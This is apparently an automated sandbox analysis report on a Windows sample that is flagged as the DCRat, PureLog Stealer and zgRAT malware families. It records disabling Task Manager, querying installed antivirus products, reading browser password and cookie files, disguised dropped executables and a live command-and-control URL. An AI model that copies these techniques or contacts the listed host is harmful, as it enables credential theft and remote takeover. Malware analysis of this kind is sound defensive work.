Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Queries volume information: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe VolumeInformation
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Queries volume information: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\ProgramData\SoftwareDistribution\cmd.exe VolumeInformation
Source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Queries volume information: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe VolumeInformation
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Queries volume information: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\ProgramData\SoftwareDistribution\cmd.exe VolumeInformation
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Queries volume information: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\ProgramData\SoftwareDistribution\cmd.exe VolumeInformation
Source: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	Queries volume information: C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe VolumeInformation
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	Queries volume information: C:\ProgramData\SoftwareDistribution\cmd.exe VolumeInformation

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Code function: 0_2_0037DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_0037DF1E

Source: C:\Users\user\Desktop\kJrNOFEGbQ.exe

Code function: 0_2_0036B146 GetVersionExW,

0_2_0036B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Windows\SysWOW64\reg.exe

Registry value created: DisableTaskMgr 1

Jump to behavior

Disables the Windows task manager (taskmgr)

Source: C:\Windows\SysWOW64\reg.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2010012696.0000000012E0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Mscommon.exe PID: 8024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7548, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: kJrNOFEGbQ.exe, type: SAMPLE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.Mscommon.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1661222491.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1951066729.00000000005C2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1660775907.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\hyperComponentFontDhcp\Mscommon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\SoftwareDistribution\cmd.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: kJrNOFEGbQ.exe, type: SAMPLE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.Mscommon.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\hyperComponentFontDhcp\Mscommon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\SoftwareDistribution\cmd.exe, type: DROPPED

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\ProgramData\SoftwareDistribution\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2010012696.0000000012E0C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Mscommon.exe PID: 8024, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7548, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: kJrNOFEGbQ.exe, type: SAMPLE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.Mscommon.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1661222491.00000000075E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1951066729.00000000005C2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1660775907.0000000006CC3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\hyperComponentFontDhcp\Mscommon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\SoftwareDistribution\cmd.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: kJrNOFEGbQ.exe, type: SAMPLE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.Mscommon.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.75e50f2.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.kJrNOFEGbQ.exe.6cc80f2.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\hyperComponentFontDhcp\Mscommon.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\SoftwareDistribution\cmd.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	241 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	21 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	157 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	11 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	31 Registry Run Keys / Startup Folder	31 Registry Run Keys / Startup Folder	1 Software Packing	NTDS	351 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	32 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	261 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
kJrNOFEGbQ.exe	74%	ReversingLabs	Win32.Trojan.Uztuby
kJrNOFEGbQ.exe	100%	Avira	VBS/Runner.VPG
kJrNOFEGbQ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\Desktop\AEzAQzJw.log	100%	Avira	HEUR/AGEN.1362695
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\RrReMzQm.log	100%	Avira	HEUR/AGEN.1300079
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\QCZpVjcx.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\WGSwrSeE.log	100%	Avira	HEUR/AGEN.1300079
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\CXEIeahW.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\Desktop\RTAxOVPQ.log	100%	Avira	TR/AVI.Agent.updqb
C:\ProgramData\SoftwareDistribution\cmd.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\qxQMjDgg8i.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\TnEFcwnq.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\JmTPAbOe.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\PIewODkQ.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\AEzAQzJw.log	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\KVMxlGUc.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\RrReMzQm.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\LSnFHGjW.log	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\WGSwrSeE.log	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\JVsHHpbK.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\CXEIeahW.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\GTFZlGXP.log	100%	Joe Sandbox ML
C:\ProgramData\SoftwareDistribution\cmd.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\jDownloader\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\ProgramData\SoftwareDistribution\cmd.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\Public\Libraries\ruRRsbcJNKBbiFjvLZZICNpuYz.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AEzAQzJw.log	17%	ReversingLabs
C:\Users\user\Desktop\BjUpXdep.log	25%	ReversingLabs
C:\Users\user\Desktop\BpLaswaY.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\CXEIeahW.log	17%	ReversingLabs
C:\Users\user\Desktop\FrRytwYk.log	8%	ReversingLabs
C:\Users\user\Desktop\GTFZlGXP.log	8%	ReversingLabs
C:\Users\user\Desktop\JVsHHpbK.log	5%	ReversingLabs
C:\Users\user\Desktop\JmTPAbOe.log	21%	ReversingLabs
C:\Users\user\Desktop\KAZQIQEM.log	21%	ReversingLabs
C:\Users\user\Desktop\KVMxlGUc.log	16%	ReversingLabs
C:\Users\user\Desktop\LSnFHGjW.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\NDzgjDBy.log	8%	ReversingLabs
C:\Users\user\Desktop\PIewODkQ.log	8%	ReversingLabs
C:\Users\user\Desktop\QCZpVjcx.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\RCtfAzVO.log	21%	ReversingLabs
C:\Users\user\Desktop\RTAxOVPQ.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\RrReMzQm.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\SIrnFmDG.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\SzUnVzkJ.log	25%	ReversingLabs
C:\Users\user\Desktop\TnEFcwnq.log	16%	ReversingLabs
C:\Users\user\Desktop\WGSwrSeE.log	17%	ReversingLabs
C:\Users\user\Desktop\WmSvTfGg.log	17%	ReversingLabs
C:\Users\user\Desktop\XDtENRtz.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\bZkuwcVU.log	8%	ReversingLabs
C:\Users\user\Desktop\bhUNaLwZ.log	25%	ReversingLabs
C:\Users\user\Desktop\cNoChqRS.log	9%	ReversingLabs
C:\Users\user\Desktop\dwWdpxyo.log	29%	ReversingLabs
C:\Users\user\Desktop\fplMbujm.log	9%	ReversingLabs
C:\Users\user\Desktop\gVlLDILN.log	21%	ReversingLabs
C:\Users\user\Desktop\hJqUpVHL.log	12%	ReversingLabs
C:\Users\user\Desktop\iXYuZrQJ.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\Desktop\iaQciIuf.log	12%	ReversingLabs
C:\Users\user\Desktop\jXskDIJa.log	5%	ReversingLabs
C:\Users\user\Desktop\lZeSZrOV.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\oGeTRkCA.log	25%	ReversingLabs
C:\Users\user\Desktop\qVgkgWEP.log	8%	ReversingLabs
C:\Users\user\Desktop\sfNsKLIr.log	25%	ReversingLabs
C:\Users\user\Desktop\spksuybo.log	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\vIyiJTTD.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\vwiBQQWj.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\wwCruhPB.log	25%	ReversingLabs
C:\Users\user\Desktop\zepZsevX.log	29%	ReversingLabs
C:\hyperComponentFontDhcp\Mscommon.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label
http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php	100%	Avira URL Cloud	malware
http://193.58.121.137	0%	Avira URL Cloud	safe
http://193.58.H:	0%	Avira URL Cloud	safe
http://193.58.H	0%	Avira URL Cloud	safe
http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Gam	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Game/servermariadbvideodownloads/imageVideorequestSecureProcesstrackwpcentral.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	false		high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	xu1yHoHXYs.33.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	false		high
http://www.fontbureau.com/designers/?	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	false		high
http://193.58.H	cmd.exe, 00000021.00000002.2927984204.0000000003709000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://193.58.121.137/privateDownloadsvideoLocal/videoWordpressPythonwindows/Game/localTrackcpu/7Gam	cmd.exe, 00000021.00000002.2927984204.0000000003309000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003590000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2927984204.0000000003697000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	false		high
http://www.tiro.com	cmd.exe, 00000021.00000002.3002883654.000000001FAF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	cmd.exe, 00000021.00000002.2960240570.000000001383B000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000021.00000002.2960240570.00000000138EF000.00000004.00000800.00020000.00000000.sdmp, 9DXwxxN5xZ.33.dr, nx7u18ycrY.33.dr	false		high
